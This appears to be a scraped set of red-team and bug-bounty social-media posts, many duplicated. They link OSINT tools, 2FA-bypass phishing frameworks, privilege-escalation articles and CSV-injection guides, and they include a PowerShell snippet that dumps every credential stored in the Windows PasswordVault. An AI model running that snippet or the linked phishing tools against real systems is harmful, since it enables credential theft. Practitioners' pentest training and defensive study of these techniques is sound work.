Have you checked your PSReadline history lately? Do you know it stores the commands in clear-text and is persistent across reboots? This is on a Domain Controller. #PowerShell #RedTeam
#OSINT :
Built With:https://builtwith.com
Google Dorks:https://exploit-db.com/google-hacking-database/
Metagoofil:https://code.google.com/archive/p/metagoofil
Censys:https://censys.io
URLScan:https://urlscan.io
DNSStuff:https://dnsstuff.com/tools
Netcraft:https://searchdns.netcraft.com
#bugbountytips #redteam #BugBountyTip
Built With:https://builtwith.com
Google Dorks:https://exploit-db.com/google-hacking-database/
Metagoofil:https://code.google.com/archive/p/metagoofil
Censys:https://censys.io
URLScan:https://urlscan.io
DNSStuff:https://dnsstuff.com/tools
Netcraft:https://searchdns.netcraft.com
#bugbountytips #redteam #BugBountyTip
BuiltWith
Find out what websites are BuiltWith
different 2FA bypasses:
evilginx:https://github.com/kgretzky/evilginx2
CredSniper:https://github.com/ustayready/CredSniper
ReelPhish:https://github.com/fireeye/ReelPhish
Modlishka:https://github.com/drk1wi/Modlishka
#pentest #hacking #phishing #redteam #bugbountytip
evilginx:https://github.com/kgretzky/evilginx2
CredSniper:https://github.com/ustayready/CredSniper
ReelPhish:https://github.com/fireeye/ReelPhish
Modlishka:https://github.com/drk1wi/Modlishka
#pentest #hacking #phishing #redteam #bugbountytip
GitHub
GitHub - kgretzky/evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session…
Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication - kgretzky/evilginx2
Useful for #redteam
PENTESTING-BIBLE
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE
Nishang
https://github.com/samratashok/nishang
Awesome Red Teaming
https://github.com/yeyintminthuhtut/Awesome-Red-Teaming
LOLBins and LOLScripts
https://github.com/LOLBAS-Project/LOLBAS
Collection Document
https://github.com/tom0li/collection-document
Venom
https://github.com/Dliv3/Venom
#bugbountytip
PENTESTING-BIBLE
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE
Nishang
https://github.com/samratashok/nishang
Awesome Red Teaming
https://github.com/yeyintminthuhtut/Awesome-Red-Teaming
LOLBins and LOLScripts
https://github.com/LOLBAS-Project/LOLBAS
Collection Document
https://github.com/tom0li/collection-document
Venom
https://github.com/Dliv3/Venom
#bugbountytip
GitHub
GitHub - blaCCkHatHacEEkr/PENTESTING-BIBLE: articles
articles. Contribute to blaCCkHatHacEEkr/PENTESTING-BIBLE development by creating an account on GitHub.
Hacking SQL Server Stored Procedures
1: (un)Trustworthy Databases
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
2: User Impersonation
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
3: SQL Injection
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
4: Enumerating Domain Accounts
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
#infosec #pentest #redteam
1: (un)Trustworthy Databases
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
2: User Impersonation
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
3: SQL Injection
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
4: Enumerating Domain Accounts
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
#infosec #pentest #redteam
NetSPI
Hacking SQL Server Stored Procedures – Part 1: (un)Trustworthy Databases
In this blog I’ll show how database users commonly created for web applications can be used to escalate privileges in SQL Server when database ownership is poorly configured.
CSV Injection: http://ghostlulz.com/csv-injection/
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API : http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API : http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
Ghostlulz
CSV Injection - Ghostlulz
How to use CSV injection AKA Formula injection to embed a malicous payload into to spread sheet.
Linux For Pentester:tmux Privilege Escalation.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20For%20Pentester:%20tmux%20Privilege%20Escalation.pdf
Linux for Pentester:Perl Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2/Linux%20for%20Pentester:%20Perl%20Privilege%20Escalation.pdf
Linux for Pentester:ed Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20for%20Pentester:%20ed%20Privilege%20Escalation.pdf
#Pentesting #RedTeam #hacking #PenTest
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20For%20Pentester:%20tmux%20Privilege%20Escalation.pdf
Linux for Pentester:Perl Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2/Linux%20for%20Pentester:%20Perl%20Privilege%20Escalation.pdf
Linux for Pentester:ed Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20for%20Pentester:%20ed%20Privilege%20Escalation.pdf
#Pentesting #RedTeam #hacking #PenTest
GitHub
blaCCkHatHacEEkr/PENTESTING-BIBLE
This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .L...
Return a list of endpoints from a swagger.json.
Pass them to your fuzzer(s), +profit?
curl -s hxxps://petstore.swagger.io/v2/swagger.json | jq '.paths | keys[]'
#bugbounty #bugbountytips #redteam #security #oneliner #bash
Pass them to your fuzzer(s), +profit?
curl -s hxxps://petstore.swagger.io/v2/swagger.json | jq '.paths | keys[]'
#bugbounty #bugbountytips #redteam #security #oneliner #bash
Dump local Creds
PS>
[void][http://Windows.Security.Credentials.PasswordVault,http://Windows.Security.Credentials,ContentType=WindowsRuntime]
$pw = New-Object http://Windows.Security.Credentials.PasswordVault
$pw.RetrieveAll() | % { $_.RetrievePassword();$_ }
#redteam #pentest
PS>
[void][http://Windows.Security.Credentials.PasswordVault,http://Windows.Security.Credentials,ContentType=WindowsRuntime]
$pw = New-Object http://Windows.Security.Credentials.PasswordVault
$pw.RetrieveAll() | % { $_.RetrievePassword();$_ }
#redteam #pentest